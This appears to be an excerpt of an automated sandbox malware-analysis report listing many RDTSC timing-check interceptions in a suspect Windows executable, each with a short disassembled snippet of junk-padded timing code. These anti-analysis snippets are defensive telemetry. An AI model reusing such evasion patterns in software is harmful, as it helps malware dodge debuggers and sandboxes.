                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2FFBA1 second address: 2FFBA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2FFE7E second address: 2FFE84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2FFE84 second address: 2FFE88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3006C3 second address: 3006DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC60h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3006DD second address: 3006FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A781h 0x00000007 jno 00007F8080B8A776h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 30367A second address: 30367F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 30A5E9 second address: 30A5ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 30A5ED second address: 30A60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8080FFFC66h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 30A60C second address: 30A615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 30A615 second address: 30A619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 309675 second address: 309679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 309679 second address: 309698 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F8080FFFC5Dh 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 309698 second address: 3096B8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8080B8A776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8080B8A780h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3096B8 second address: 3096BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3096BC second address: 3096F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jns 00007F8080B8A776h 0x0000000d pop ebx 0x0000000e pushad 0x0000000f je 00007F8080B8A776h 0x00000015 jl 00007F8080B8A776h 0x0000001b push edi 0x0000001c pop edi 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f popad 0x00000020 pushad 0x00000021 jmp 00007F8080B8A781h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 309E0C second address: 309E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 309E15 second address: 309E19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 309E19 second address: 309E1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 30DA7E second address: 30DA99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A786h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 30FD63 second address: 30FD6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 30F8B9 second address: 30F8CD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8080B8A776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F8080B8A77Ah 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 30F8CD second address: 30F8E3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8080FFFC5Ch 0x00000008 jl 00007F8080FFFC56h 0x0000000e je 00007F8080FFFC5Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 30FA61 second address: 30FA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8080B8A785h 0x00000009 jl 00007F8080B8A776h 0x0000000f popad 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 30FA81 second address: 30FA8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F8080FFFC56h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 317775 second address: 317779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 317779 second address: 31777D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3178FA second address: 317901 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 317A31 second address: 317A7B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8080FFFC5Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b je 00007F8080FFFC58h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jmp 00007F8080FFFC68h 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jc 00007F8080FFFC56h 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 jc 00007F8080FFFC56h 0x00000029 popad 0x0000002a push ecx 0x0000002b push eax 0x0000002c pop eax 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 317BE9 second address: 317C0F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F8080B8A786h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F8080B8A77Eh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 317C0F second address: 317C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c popad 0x0000000d push esi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 317F18 second address: 317F1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 318055 second address: 31805D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 31805D second address: 318063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 318063 second address: 318067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 318067 second address: 31806D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 31C563 second address: 31C594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F8080FFFC62h 0x00000012 jno 00007F8080FFFC56h 0x00000018 jns 00007F8080FFFC56h 0x0000001e rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 31C594 second address: 31C59A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 31C59A second address: 31C59E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C80CD second address: 2C80E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8080B8A787h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2C80E8 second address: 2C80EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 31D91F second address: 31D953 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8080B8A788h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F8080B8A783h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 31F1AE second address: 31F1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8080FFFC67h 0x00000009 pop edi 0x0000000a jmp 00007F8080FFFC64h 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 31F1DE second address: 31F205 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A781h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8080B8A782h 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 31F205 second address: 31F209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 31F209 second address: 31F20F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3216C6 second address: 3216CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3216CA second address: 3216EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8080B8A788h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3216EF second address: 3216F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3216F6 second address: 32174F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F8080B8A783h 0x0000000a jmp 00007F8080B8A782h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push edi 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ecx 0x00000019 push ebx 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007F8080B8A77Bh 0x00000021 pop ebx 0x00000022 push edi 0x00000023 jmp 00007F8080B8A783h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 3219F9 second address: 3219FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 321C7F second address: 321C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 321C83 second address: 321CC0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8080FFFC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F8080FFFC60h 0x0000000f pushad 0x00000010 jl 00007F8080FFFC56h 0x00000016 jmp 00007F8080FFFC5Ch 0x0000001b jc 00007F8080FFFC56h 0x00000021 jl 00007F8080FFFC56h 0x00000027 popad 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 321CC0 second address: 321CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8080B8A780h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 327DA9 second address: 327DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F8080FFFC63h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 327DC6 second address: 327DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 328908 second address: 328919 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 328919 second address: 32892A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F8080B8A776h 0x00000009 jne 00007F8080B8A776h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 328BE0 second address: 328BE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 328BE4 second address: 328C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007F8080B8A781h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 328C01 second address: 328C05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 32CA0A second address: 32CA38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jl 00007F8080B8A77Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8080B8A77Fh 0x00000014 jnc 00007F8080B8A778h 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 32D3D7 second address: 32D3EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8080FFFC5Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 32D3EA second address: 32D3F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F8080B8A776h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 32D532 second address: 32D557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F8080FFFC61h 0x0000000e jnp 00007F8080FFFC58h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 32D557 second address: 32D578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 jnc 00007F8080B8A776h 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push ebx 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 jbe 00007F8080B8A776h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 331D36 second address: 331D3E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 33871F second address: 338745 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A785h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007F8080B8A77Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 338745 second address: 338750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 338CB8 second address: 338CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 338CC3 second address: 338CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 338CC9 second address: 338CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 338CCD second address: 338CF1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jno 00007F8080FFFC56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007F8080FFFC68h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 338CF1 second address: 338CF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 338CF6 second address: 338CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 338CFC second address: 338D02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 338E79 second address: 338EC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC5Fh 0x00000007 jmp 00007F8080FFFC5Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F8080FFFC63h 0x00000014 jmp 00007F8080FFFC65h 0x00000019 popad 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 338FDC second address: 338FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 34092F second address: 340935 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 340935 second address: 340943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F8080B8A778h 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 340943 second address: 34095C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F8080FFFC63h 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2837F4 second address: 2837F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2837F9 second address: 28382F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8080FFFC67h 0x00000008 jmp 00007F8080FFFC67h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 340372 second address: 34037D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8080B8A776h 0x0000000a popad 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 34037D second address: 3403A4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8080FFFC58h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F8080FFFC61h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jnp 00007F8080FFFC64h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 34A221 second address: 34A225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 34D163 second address: 34D198 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 jmp 00007F8080FFFC5Ah 0x00000015 jmp 00007F8080FFFC65h 0x0000001a pop ecx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 34D198 second address: 34D1AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push esi 0x0000000a jno 00007F8080B8A776h 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 34D1AF second address: 34D1B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 35606A second address: 356089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8080B8A787h 0x00000009 pop esi 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 356089 second address: 356090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 rdtsc
